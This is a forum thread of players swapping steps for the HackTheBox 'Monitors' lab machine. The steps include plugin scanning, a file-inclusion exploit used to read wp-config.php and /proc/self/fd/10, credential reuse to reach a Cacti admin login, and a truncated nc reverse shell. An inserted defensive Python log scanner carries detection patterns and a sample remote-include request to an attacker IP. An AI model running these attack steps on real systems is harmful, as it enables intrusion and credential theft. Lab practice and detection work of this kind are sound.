TUTORIAL Monitors - Hackthebox
by sanakasa - April 24, 2021 at 09:28 PM
#1
This is the thread to talk about what we have from the new hackthebox machine Monitors. Let's gooooooooo
#2
LFI - RFI and got passwd but stuck
#3
1) Find the vulnerable plugin: `wpscan --url http://monitors.htb/ -e ap,t,tt,u`

2) Use this CVE for RFI/LFI (Spritz 1.0): https://www.exploit-db.com/exploits/44544
#4
I think we're all at the same spot. RFI seems to semi-work but won't execute a PHP payload. Anyone know where it might store the file once it downloads it?
#5
* Use LFI mentioned above to read /var/www/wordpress/wp-config.php (view source)
* Get WP database password '[email protected]!'
* Use LFI to include /proc/self/fd/10 to get the apache access log.
* From the access log, see new vhost 'http://cacti-admin.monitor.htb' - add this to your hosts
* Use WP database password to log in to Cacti as admin user.
* ???
* profit
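As an added defender-side example (not from any poster in this thread), here is a small Python scanner that flags the kinds of requests described in posts #3 and #5 (path traversal, reads of wp-config.php and /proc/self/fd/N, and remote URLs in query parameters) in Apache access logs. The log lines, IPs, plugin path and parameter name are constructed placeholders, not the real plugin endpoint.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample Apache combined-format log lines (not taken from the thread).
# The plugin path and parameter name are placeholders, not the real Spritz endpoint.
SAMPLE_LOG = """\
10.10.14.5 - - [24/Apr/2021:21:30:01 +0000] "GET /wp-content/plugins/example-plugin/view.php?file=/../../../../var/www/wordpress/wp-config.php HTTP/1.1" 200 812 "-" "curl/7.74.0"
10.10.14.5 - - [24/Apr/2021:21:31:12 +0000] "GET /wp-content/plugins/example-plugin/view.php?file=/proc/self/fd/10 HTTP/1.1" 200 9120 "-" "curl/7.74.0"
10.10.14.5 - - [24/Apr/2021:21:32:40 +0000] "GET /wp-content/plugins/example-plugin/view.php?file=http%3A%2F%2F10.10.14.5%2Fshell.txt HTTP/1.1" 200 54 "-" "curl/7.74.0"
192.168.1.20 - - [24/Apr/2021:21:33:02 +0000] "GET /index.php?p=3 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Detection rules applied to every decoded query-string value.
RULES = [
    ("path_traversal", re.compile(r"\.\./|\.\.\\")),
    ("sensitive_file", re.compile(r"/etc/passwd|wp-config\.php|/proc/self/(?:fd|environ)|/var/log/")),
    ("remote_include", re.compile(r"^(?:https?|ftp|php|data)://", re.IGNORECASE)),
]


def analyse_request(target: str) -> list[str]:
    """Return the names of the rules matched by any query value of a request target."""
    query = urlsplit(target).query
    values = [v for _, v in parse_qsl(query, keep_blank_values=True)]  # one decode pass
    candidates = set()
    for v in values:
        once = unquote(v)  # catch double-encoded payloads (%252e -> %2e -> .)
        candidates.update({v, once, unquote(once)})
    return [name for name, rx in RULES if any(rx.search(c) for c in candidates)]


def scan_log(text: str) -> list[dict]:
    """Return one finding per log line whose query values trip at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        hits = analyse_request(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                             "target": m["target"], "rules": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['status']} {','.join(f['rules'])} {f['target']}")
```

The same rules can be pointed at the vhost's own log once the extra hostname from post #5 is known, since the inclusion requests will show up there as well.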
#6
I can read user.txt but HackTheBox says it is wrong.

`cat /home/marcus/user.txt`
#7
(April 24, 2021 at 11:23 PM)bosbayt Wrote: I can read user.txt but HackTheBox says it is wrong.

`cat /home/marcus/user.txt`

Do you mind sharing how you got a foothold from Cacti?
#8
Trying to find out how to read files from the SQLi. Seems like I can't make files, unless I'm getting the /tmp path wrong when looking for it.
#9
Got user, now to figure out this note.
#10
https://github.com/Cacti/cacti/issues/3622
#11
(April 25, 2021 at 08:39 AM)Jockerjock Wrote: https://github.com/Cacti/cacti/issues/3622

Been trying this for a while. I know it works, but I haven't been able to get a payload that does anything.
#12
(April 25, 2021 at 08:46 AM)airspitter Wrote:
(April 25, 2021 at 08:39 AM)Jockerjock Wrote: https://github.com/Cacti/cacti/issues/3622

Been trying this for a while. I know it works, but I haven't been able to get a payload that does anything.

Try an nc reverse shell:

`rm /tmp/f;mkfifo /tmp/f.....`